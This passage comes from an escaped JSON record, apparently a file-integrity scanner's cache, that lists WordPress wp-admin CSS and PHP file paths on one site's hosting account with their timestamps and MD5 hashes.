32d5e48fa7eb9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/blue\\/colors-rtl.min.css\":{\"d\":1539044566,\"h\":\"41f278bf580d299962fb0228d5b3c789\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/blue\\/colors.min.css\":{\"d\":1539044566,\"h\":\"9871ee227143cdee76b565c2ce1c23f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/blue\\/colors-rtl.css\":{\"d\":1508792690,\"h\":\"1eabb79616c817d36c47003b9ac16aa0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/blue\\/colors.scss\":{\"d\":1391658918,\"h\":\"d9d03549d79484672c29145aad594db3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/coffee\\/colors.css\":{\"d\":1508792690,\"h\":\"059a5265a9a022fa492324fb90341055\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/coffee\\/colors-rtl.min.css\":{\"d\":1508792690,\"h\":\"4ed4244ba484a49d295fa48d29957533\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/coffee\\/colors.min.css\":{\"d\":1508792690,\"h\":\"af368ebb8350419c26769db1ab139778\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/coffee\\/colors-rtl.css\":{\"d\":1508792690,\"h\":\"e1f8d2bad643e1a93cc9f2d5908e60aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/coffee\\/colors.scss\":{\"d\":1391658918,\"h\":\"397e3820b27a234330c95e05250f61ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/ectoplasm\\/colors.css\":{\"d\":1508792690,\"h\":\"71e7589f78c5423719c15ebe510f4d25\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/ectoplasm\\/colors-rtl.min.css\":{\"d\":1508792690,\"h\":\"36a186d038c83593e79d1a0cc8876bc4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/ectoplasm\\/colors.min.css\":{\"d\":1508792690,\"h\":\"fc7c114669f52b57e6ba46c66dfd1525\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/ectoplasm\\/colors-rtl.css\":{\"d\":1508792690,\"h\":\"cf22f6cdf0c754d17e18968603839536\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/ectoplasm\\/colors.scss\":{\"d\":1391658918,\"h\":\"940171d1392bd8071122a905d12b9195\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/_variables.scss\":{\"d\":1428259828,\"h\":\"3ab501096b1a091972d84c85b284135a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/_mixins.scss\":{\"d\":1508792690,\"h\":\"18d869c6a21b54fdf1038dadc8b62810\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/_admin.scss\":{\"d\":1494072464,\"h\":\"c22ff1bb2db45ee3879ba234761ba618\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/l10n.min.css\":{\"d\":1539044566,\"h\":\"2b2ed5045b480dcfac2e6babbd2f2007\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/revisions-rtl.css\":{\"d\":1540175680,\"h\":\"680ce200631f3e5cea718914a27f2b20\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/site-icon-rtl.css\":{\"d\":1500158746,\"h\":\"843b8077b07dce1d6bd532aa7ad3e61b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/revisions.min.css\":{\"d\":1540175680,\"h\":\"f1a70d5db540011fd1dea2d1d4d681d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/customize-nav-menus.css\":{\"d\":1515776202,\"h\":\"67aad3843e4f5f4bde34a2f5c9c46aaa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/ie.css\":{\"d\":1506972172,\"h\":\"300482d04f7035050c8221a2388fa20b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/themes-rtl.min.css\":{\"d\":1540175680,\"h\":\"5976bde31a300bab3a5d50f41b272b61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/customize-nav-menus-rtl.min.css\":{\"d\":1539044566,\"h\":\"66bdd3cfa4505a15480321e0ec125d3f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/code-editor.css\":{\"d\":1539220342,\"h\":\"2982623d3fb11fcd05f8eb36b84cb557\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/deprecated-media-rtl.min.css\":{\"d\":1539044566,\"h\":\"ae51dff82ed4709e6460661d4999aea8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/admin-menu-rtl.css\":{\"d\":1540175680,\"h\":\"d58d3bec2d7c08206d637707aaf23b71\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/list-tables.css\":{\"d\":1540175680,\"h\":\"6e5a8f97fb61749f4ce2774ce9882d9f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/ie-rtl.css\":{\"d\":1506972172,\"h\":\"f6cb41f2339fb35c868329897706705d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/ie-rtl.min.css\":{\"d\":1539044566,\"h\":\"d3948c5ae3ff777bee390743048c01ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/customize-nav-menus.min.css\":{\"d\":1539044566,\"h\":\"ff497c14667947cbbe75153b587405a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/install.min.css\":{\"d\":1539044566,\"h\":\"4423dc9caa273de00b935fb0995270fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/revisions-rtl.min.css\":{\"d\":1540175680,\"h\":\"8386d6dcf5ce18b47f790acecbd3dd97\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/list-tables.min.css\":{\"d\":1540175680,\"h\":\"6a1898eda2575feefd20d8817a81610a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/list-tables-rtl.min.css\":{\"d\":1540175680,\"h\":\"8af5643dc6458748de289b840a9916e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/wp-admin.css\":{\"d\":1435573706,\"h\":\"bfe4bd90350018abc7c9210bfb9d2a5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/ie.min.css\":{\"d\":1539044566,\"h\":\"1447ed1679f787adc186df8eac30ce1e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/farbtastic.css\":{\"d\":1384696092,\"h\":\"f9e33829b8faed7d7bbef843fb683255\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/forms.css\":{\"d\":1540175680,\"h\":\"1b5477771d13050c5543044bf233a88e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/customize-controls-rtl.css\":{\"d\":1540175680,\"h\":\"9773dbbd9d575e3a0e0fc860a0e55d40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/customize-widgets-rtl.css\":{\"d\":1500158746,\"h\":\"e780700354f7e9e075448078b58814a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/color-picker.min.css\":{\"d\":1540175680,\"h\":\"267633fa6a190b5fa93afcc31f25adac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/l10n-rtl.min.css\":{\"d\":1539044566,\"h\":\"c14f53b547661c4be7bd9a8e38dcdb5d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/code-editor.min.css\":{\"d\":1539220342,\"h\":\"4f2bbc906ad777689f33ed3a8e11de4e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/about-rtl.css\":{\"d\":1544039748,\"h\":\"44136116a8d6a562e4e24c2e92a5497e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/common-rtl.min.css\":{\"d\":1547081533,\"h\":\"96c50e7ed61f473ae43fea164c028c5a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/deprecated-media.min.css\":{\"d\":1539044566,\"h\":\"87fe11509d4e425db64abd2e0394d4ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/wp-admin-rtl.css\":{\"d\":1435573706,\"h\":\"74f9dcf5ab8c92f6666ff52c699873c8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/themes.css\":{\"d\":1540175680,\"h\":\"9071b556370c3845075580318a236b2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/widgets.min.css\":{\"d\":1540175680,\"h\":\"35ac681c6587823563f4ecee720be77e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/dashboard-rtl.css\":{\"d\":1540283680,\"h\":\"b4dcdb2ce9b2b421061b957711fcc5ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/edit.css\":{\"d\":1540175680,\"h\":\"6bbb337fa6d1a1f211d0886806b10974\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/widgets-rtl.min.css\":{\"d\":1540175680,\"h\":\"588617d976f0fb7e8d6377001ceda9b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/install.css\":{\"d\":1506707030,\"h\":\"32d34c1ae9e1b6303fb0b846991d308b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/code-editor-rtl.css\":{\"d\":1539220342,\"h\":\"8c7770ef099a7c001a3f8d103d95291d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/media-rtl.css\":{\"d\":1540175680,\"h\":\"954b5c4a4a4f15fac61f4fc17bf58e61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/nav-menus-rtl.min.css\":{\"d\":1539044566,\"h\":\"48d54770a01d9bfda2cf1d474fe33ce8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/color-picker-rtl.min.css\":{\"d\":1540175680,\"h\":\"cccc0c8b5781a897c2797f83384ee717\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/site-icon.css\":{\"d\":1500158746,\"h\":\"8d0ea8f47d8c45b2a80211d470306c75\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/login-rtl.min.css\":{\"d\":1540175680,\"h\":\"fefacd93bdb86714698d998fc0f2a865\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/farbtastic-rtl.css\":{\"d\":1384696092,\"h\":\"118f1189ffbb71e014402121b5456bc2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/common.min.css\":{\"d\":1547081533,\"h\":\"cfa9e1f2a74fb8c9181b1a4faffec319\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/media.min.css\":{\"d\":1540175680,\"h\":\"60ec435acce0172de2eb1e32604be34d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/customize-controls.min.css\":{\"d\":1540175680,\"h\":\"3364a10ed6cf2020afca1aa446e3651a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/list-tables-rtl.css\":{\"d\":1540175680,\"h\":\"8ba73ea9935bbe0062f747e1d084f542\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/color-picker.css\":{\"d\":1540175680,\"h\":\"aa73ab1f23b74890805f2331ca695045\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/nav-menus-rtl.css\":{\"d\":1521382782,\"h\":\"6583418c9dfc4767fd8df8059be75015\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/color-picker-rtl.css\":{\"d\":1540175680,\"h\":\"8c4e9e4548bc64ed268f8f439d7c7c15\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/media-rtl.min.css\":{\"d\":1540175680,\"h\":\"3b139483643b8769ec041e86142f0b0c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/common-rtl.css\":{\"d\":1547081533,\"h\":\"3056f4e370a1881381f87d058a505e13\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/customize-widgets.min.css\":{\"d\":1539044566,\"h\":\"72dd5584fa727bd5baacf7dad434e8e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/revisions.css\":{\"d\":1540175680,\"h\":\"b196971abc1abc7ea2cb4bc0a3ab7535\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/farbtastic-rtl.min.css\":{\"d\":1503164448,\"h\":\"d55340e3ce5b935c2cf0337c92b61521\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/forms-rtl.min.css\":{\"d\":1540175680,\"h\":\"d155c4000f10a61e0793569fcb399998\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/media.css\":{\"d\":1540175680,\"h\":\"6875a80f6acd9176e518bcd86c364a91\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/about.min.css\":{\"d\":1544039748,\"h\":\"718d7d80feb983bda20b662544bff255\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/l10n-rtl.css\":{\"d\":1466179648,\"h\":\"69b0527be5b3aa2c1644fe5fc1c34afa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/themes-rtl.css\":{\"d\":1540175680,\"h\":\"3d6bf238e618acab0ba06717265a5968\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/admin-menu.min.css\":{\"d\":1540175680,\"h\":\"92589674d68fa4fd88208767abfb29bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/edit-rtl.min.css\":{\"d\":1540175680,\"h\":\"cfba250fba322ce18b32d62855fb192f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/themes.min.css\":{\"d\":1540175680,\"h\":\"5bdad071f9e7cfe1a7a92a62d758bbf1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/login.css\":{\"d\":1526394346,\"h\":\"172dda34727301b786a0037bf6acf0af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/forms.min.css\":{\"d\":1540175680,\"h\":\"fb7105f56049ea9973bd87e921d05aa2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/wp-admin-rtl.min.css\":{\"d\":1503164448,\"h\":\"9ff8672a8c72aecf01e6efa72daf2458\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/widgets.css\":{\"d\":1540175680,\"h\":\"bf91cac38229762201f530491ba2b604\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/l10n.css\":{\"d\":1466179648,\"h\":\"b5c4b8f85029fb7c84f0719f72b280ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/farbtastic.min.css\":{\"d\":1503164448,\"h\":\"23d55eb53a88478028930c82b13a6b0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/site-icon.min.css\":{\"d\":1503164448,\"h\":\"6c951fcb811b78da4a91c55447888f98\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/forms-rtl.css\":{\"d\":1540175680,\"h\":\"2113853f02adcfec75306e443c560e3b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/admin-menu.css\":{\"d\":1540175680,\"h\":\"54c7805c00f9d4ee074fb60669e93fa7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/widgets-rtl.css\":{\"d\":1540175680,\"h\":\"461cdf628f771b69a60dd1ba4ba4c3dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/site-icon-rtl.min.css\":{\"d\":1503164448,\"h\":\"c5605f3fde843ddb7cf887a72b9464a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/deprecated-media-rtl.css\":{\"d\":1500158746,\"h\":\"10accf784a72c030297a52b5a33ce42f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/login-rtl.css\":{\"d\":1526394346,\"h\":\"6892675f6dabe164a066d42040451ffd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/about.css\":{\"d\":1544039748,\"h\":\"229b8ef25f99dcdb2a3bb54aa98e05f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/nav-menus.css\":{\"d\":1521382782,\"h\":\"03fe2a02684af9dd3c05d206434700ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/common.css\":{\"d\":1547081533,\"h\":\"6488275ef0769671a1ee7f3aa57288dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/customize-controls.css\":{\"d\":1540175680,\"h\":\"517ab56b0d531c6967cac1e0907dc5fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/deprecated-media.css\":{\"d\":1500158746,\"h\":\"eb2ea5040c616ab1da534bfa6940d877\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/code-editor-rtl.min.css\":{\"d\":1539220342,\"h\":\"ec293f73d213bb45f413489b1be4ddd1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/install-rtl.min.css\":{\"d\":1539044566,\"h\":\"fd0ebb2e5cb4a51dbd122659f4e88042\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/about-rtl.min.css\":{\"d\":1544039748,\"h\":\"ad2c3b52306afa838247a29f5dc8abaf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/wp-admin.min.css\":{\"d\":1503164448,\"h\":\"2bcbab07977867b916887573559917fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/dashboard-rtl.min.css\":{\"d\":1540283680,\"h\":\"e954ddd78c021db65a745bcf468e71bf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/nav-menus.min.css\":{\"d\":1539044566,\"h\":\"dd459e1742a3926a3675f688d0ef92da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/customize-widgets.css\":{\"d\":1500158746,\"h\":\"f35e5a714f46d769b8dcb01fe6adf942\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/admin-menu-rtl.min.css\":{\"d\":1540175680,\"h\":\"b483b39360a65b857ce7a566fb7825ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/customize-nav-menus-rtl.css\":{\"d\":1515776202,\"h\":\"1bf381b227fd0f82983f7f42bfee09e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/edit.min.css\":{\"d\":1540175680,\"h\":\"28dd93cd05da310c09f74bc10291e1a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/edit-rtl.css\":{\"d\":1540175680,\"h\":\"ef08248e4b4503b682c13cded1b0647a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/login.min.css\":{\"d\":1540175680,\"h\":\"4fbee54e4f5824b05f1269c562d1f860\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/dashboard.min.css\":{\"d\":1540283680,\"h\":\"16ae3878586942fdae57e349dcda572e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/install-rtl.css\":{\"d\":1506707030,\"h\":\"3382df7e6ea38b249a7c9e71c72a56e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/customize-controls-rtl.min.css\":{\"d\":1540175680,\"h\":\"314978fac5db55469bc5810682ca1827\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/customize-widgets-rtl.min.css\":{\"d\":1539044566,\"h\":\"7a8fa3d526d993a0cc51ee54c37c9b70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/dashboard.css\":{\"d\":1540283680,\"h\":\"1aef04d8948c142c1e238d7c5d261a1c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/plugin.php\":{\"d\":1540530506,\"h\":\"0e8d53d2d1a839b6760d2b7dc42c6903\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-theme-upgrader-skin.php\":{\"d\":1507556088,\"h\":\"5f4aef573b8a94e1d7a10c84ea5e1fba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-ajax-upgrader-skin.php\":{\"d\":1501107044,\"h\":\"1f43ae42f4c1a5b6efae1472328e895c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-automatic-updater.php\":{\"d\":1508339930,\"h\":\"686ed64faef1e7b8f3724cb856304c48\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-pclzip.php\":{\"d\":1468920330,\"h\":\"59c701d09896cf859689dcf457597084\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-ftp-sockets.php\":{\"d\":1472228250,\"h\":\"076ca839e8552b45a3eef558aa2b1996\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/ajax-actions.php\":{\"d\":1544673263,\"h\":\"4ad3ebd31c52bca6902844407ac704b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-themes-list-table.php\":{\"d\":1501766024,\"h\":\"45e4c073a4d842c4a11e784e48714edd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-posts-list-table.php\":{\"d\":1541030746,\"h\":\"1c4aa6dad64b146496961c36384bfca1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-plugin-install-list-table.php\":{\"d\":1543586026,\"h\":\"cda37dfb17a74ed392141a68d00ed794\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-importer.php\":{\"d\":1506564166,\"h\":\"64e2709fe9be639383f9a0d6f90423c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/widgets.php\":{\"d\":1506520784,\"h\":\"146c291366a4d6793de022c38be33e96\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/credits.php\":{\"d\":1506973486,\"h\":\"472efb2d52ee83b4ddc5d1ab2b1ab698\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-bulk-upgrader-skin.php\":{\"d\":1501107044,\"h\":\"147eea3b6298d03d2ce3dc4a5436580e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/ms-deprecated.php\":{\"d\":1498144726,\"h\":\"ab9ee3d59c37a9d9961bcb5dfaf571ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/file.php\":{\"d\":1532435786,\"h\":\"c594b909238dc90b02877bf9f7c7be59\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-language-pack-upgrader-skin.php\":{\"d\":1501107044,\"h\":\"4909f951f3b23295108a2435bd98e0ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/admin.php\":{\"d\":1472652090,\"h\":\"5c7b0c8c7acd69508d8f19c3c61a71c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/theme-install.php\":{\"d\":1503393768,\"h\":\"577e7b9203e3115561f97b2ecc1b5777\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-list-table-compat.php\":{\"d\":1501107044,\"h\":\"f15e7e5491d3083cd63d38a5cfb0700a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-language-pack-upgrader.php\":{\"d\":1508337948,\"h\":\"f2a18bbd9712044cd139488d75da6625\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/options.php\":{\"d\":1510190856,\"h\":\"4b4ab0d3e06315e8a9a2e863465462c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-ms-themes-list-table.php\":{\"d\":1506964488,\"h\":\"4a51e17e28e8794f9c6b47892d435409\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/list-table.php\":{\"d\":1472652090,\"h\":\"4e7c28cca8a3462521d71d0685b2f36f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/plugin-install.php\":{\"d\":1545267191,\"h\":\"3cbf26a4c042962a282e66cb6e4e4e06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/revision.php\":{\"d\":1506027824,\"h\":\"e8d401842a9742a8758d8aac8ffcd75a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-media-list-table.php\":{\"d\":1525203268,\"h\":\"0e09e4db71e62ac99db4ff5ecd25344f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/admin-filters.php\":{\"d\":1542906646,\"h\":\"5401b0769e699e69b20da1bf732141a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-walker-nav-menu-edit.php\":{\"d\":1506973486,\"h\":\"ae3a95a939da51be10e17d6fe8d845c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-filesystem-ftpext.php\":{\"d\":1501107044,\"h\":\"6fee73a7aaa76015a8406215b525b945\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/deprecated.php\":{\"d\":1506405286,\"h\":\"c2b9945923a92718e17884654a7d7786\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-terms-list-table.php\":{\"d\":1506972172,\"h\":\"e48f8e3320766e4c1d1ae28551203d3f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/class-wp-site-icon.php\":{\"d\":1501107044,\"h\":\"2b553b6302c1a22b071085d0aa51b0c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/misc.php\":{\"d\":1542906646,\"h\":\"9babcdc3839056518332b6fd33d428fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/includes\\/edit-tag-messages.php\":{\"d\":1463931090,\"h\":